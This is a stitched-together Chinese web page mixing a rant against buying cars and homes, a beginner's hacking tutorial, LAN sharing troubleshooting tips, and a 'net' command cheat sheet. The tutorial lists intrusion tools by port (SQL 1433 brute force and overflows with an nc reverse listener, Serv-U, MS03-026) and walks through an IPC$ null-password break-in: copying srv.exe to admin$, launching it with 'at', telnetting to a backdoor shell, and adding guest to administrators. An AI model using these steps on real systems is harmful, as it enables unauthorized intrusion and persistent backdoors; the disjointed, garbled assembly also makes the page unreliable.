地方，不用担心挂了碰了，不用担 心被贼偷了绑了，无论挂风下雨都有司机。万一碰着个堵车还可以下车坐地铁。一年也就一万多块RMB！要买一车

！一年停车费都得一万多！这不是傻么？
　　说别买车别买车，可就有无数的人疯了一样的去贷款买？一定要嫌自己将来死得不够惨似的！买吧，买完了加息了不是？油价涨疯了不是？停车

又贵了不是？后悔了不是？新车一上路就掉价了卖也卖不掉了不是？？
　　告诉你，油价还得涨。一定要涨到和美圆一样的油价。嘿嘿！您拿老美1/10的收入，养和人家一个价的汽油。我看您还得瑟不。
　　最后说一句，每个人都不傻，都是从小被愚民教育给弄啥了。傻点不要紧，但性命悠关的事儿您还是紧着点，多盘算盘算经济利益之间的关系！

别到头来，房产一 跌，油价一涨，交了半辈子钱拿了毕业证还是啥啥不会干，交了几十年苛捐杂税还啥啥福利没有。您亏的可不仅仅是差价几十万。
　　有人还说什么？哎呀没办法，难道不住了，不买车啦，公车好挤呀。我说全是愚民教育出来的虚荣心在做怪。您看看我，租一个房子住才一千多

块一个月，也就相当于有些人的 物业费。如果要结婚我还租得起3-4千的，家具装修一应具全。而且还哪方便我住哪儿。不想搬就长期租。也和交物

业费一个样。还白白省出还银行贷款、利息、 首付一大堆。有事就打车，没事就地铁，一年一万顶天了，还省了车库费，停车费，罚款等一堆，油价

涨到10块也乐呵，也不耽误事。俺大学没念完就跑了，一边 自学一边自己钻研市场出策划跑业务，不也同样可以进外资企业，上市企业做经理么？还

省出好几万学费来。
　　当然有的人会说：你连个房子都不买，指定结不了婚。我心想：我是没有，您以为您有啊？有人说租房子不划算，租完了还是别人的，嘿嘿，你

以为买房子还了几十年贷款，还清了就是你的了啊……

1. 1433端口入侵 　　scanport.exe 查有1433的机器
　　SQLScanPass.exe 进行字典暴破(字典是关键)
　　最后 SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。
　　nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
　　(以上反向的，测试成功)
　　sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
　　2. 4899端口入侵
　　用4899过滤器.exe，扫描空口令的机器
　　3. 3899的入侵
　　对很早的机器，可以试试3389的溢出(win3389ex.exe)
　　对2000的机器，可以试试字典暴破。(tscrack.exe)
　　4. 80入侵
　　对sp3以前的机器，可以用webdav入侵;
　　对bbs论坛，可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
　　可以利用SQL进行注入。(啊D的注入软件)。
　　5. serv-u入侵(21端口)
　　对5. 004及以下系统，可用溢出入侵。(serv5004.exe)
　　对5.1.0.0及以下系统，可用本地提升权限。(servlocal.exe)
　　对serv-u的MD5加密密码，可以用字典暴破。(crack.vbs)
　　输入一个被serv-u加密的密码(34位长)，通过与字典档(dict.txt)的比较，得到密码
　　6. 554端口
　　用real554.exe入侵。
　　7. 6129端口
　　用DameWare6129.exe入侵。
　　8. 系统漏洞
　　利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，进行溢出入侵。
9. 3127等端口
　　可以利用doom病毒开的端口，用nodoom.exe入侵。(可用mydoomscan.exe查)。
　　10. 其他入侵
　　利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
　　经典IPC$入侵
　　1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
　　这是用"流光"扫到的用户名是administrators，密码为"空"的IP地址(气好到家如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。
　　2. C:\>copy srv.exe $">\\127.0.0.1\admin$
　　先复制srv.exe上去，在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了)。
　　3. C:\>net time file://127.0.0.1/
　　查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。
　　4. C:\>at file://127.0.0.1/ 11:05 srv.exe
　　用at命令启动srv.exe吧(这里设置的时间要比主机时间快，不然你怎么启动啊.
　　5. C:\>net time file://127.0.0.1/
　　再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。
　　6. C:\>telnet 127.0.0.1 99
　　这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
　　虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
　　7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
　　用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
　　8. C:\WINNT\system32>ntlm
　　
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
　　9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
　　10. C:\>net user guest /active:yes
　　将对方的Guest用户激活
　　11. C:\>net user guest 1234
　　将Guest的密码改为1234,或者你要设定的密码
　　12. C:\>net localgroup administrators guest /add
  最后达到ADMINISTRATOR的权限
    希望能对初学入侵的有所帮助

1、启用guest来宾帐户；

2、控制面板→管理工具→本地安全策略→本地策略→用户权利指派里，“从网络访问此计算机”中加入guest帐户，

而“拒绝从网络访问这台计算机”中删除guest帐户；

3、我的电脑→工具→文件夹选项→查看→去掉“使用简单文件共享（推荐）”前的勾；

4、控制面板→管理工具→本地安全策略→本地策略→安全选项里，把“网络访问：本地帐户的共享和安全模式”设为

“仅来宾-本地用户以来宾的身份验证”（可选，此项设置可去除访问时要求输入密码的对话框，也可视情况设为“经

典-本地用户以自己的身份验证”）；

 5、右击“我的电脑”→“属性”→“计算机名”，该选项卡中有没有出现你的局域网工作组名称，如“work”等。

然后单击“网络 ID”按钮，开始“网络标识向导”：单击“下一步”，选择“本机是商业网络的一部分，用它连接到

其他工作着的计算机”；单击“下一步”，选择“公司使用没有域的网络”；单击“下一步”按钮，然后输入你的局

域网的工作组名，如“work”，再次单击“下一步”按钮，最后单击“完成”按钮完成设置

6、检查本地连接是否被禁用，右击“本地连接”→“启用”；

7、关闭网络防火墙；

8、检查是否启用了域，是否加入了该域并检查域设置；

9、检查是否关闭了server服务；

10、检查本地连接IP、子网掩码、网关及DNS设置是否有误；

11、“本地连接”→属性→常规，检查是否安装了“Microsoft网络文件和打印机共享”、“Microsoft网络客户端”

以及TCP/IP协议；

12、某些局域网游戏和软件须安装NetBEUI协议。而且网上有文章说，在小型局域网中，微软在WinXP中只支持的

TCP/IP协议和NWLink IPX/SPX/NetBIOS兼容协议表现不尽如人意，在小型局域网(拥有200台左右电脑的网络)中

NetBEUI是占用内存最少、速度最快的一种协议。
给系统打上补丁。WinXP访问网上邻居的速度较慢，这是WinXP的一个Bug，当我们打开网上邻居时，操作系统首先会从

计划任务中进行查找，因此就大大影响了访问的速度，除非您已经安装了SP1补丁才不会存在这个问题。

13、先卸载网卡驱动，重启再重装；

14、硬件问题，检查网卡、网线、集线器、路由器等，在检查之前，最好先重启一下网络设备(集线器、交换机、路由

器)看能否解决；

15、病毒(木马)原因。升级病毒库安全模式下全盘杀毒。

net user命令集合详解！！！

net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为

H:
net use h: \\ip\c$ 登陆后映射对方C：到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名　密码　/add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其

具有管理员权限,注意：administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名　 开启服务；(如:net start telnet， net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加

上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C：共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况，常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip

协议使用情况）
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的

用户名（03前的为用户名）-注意：参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设

置超时间隔。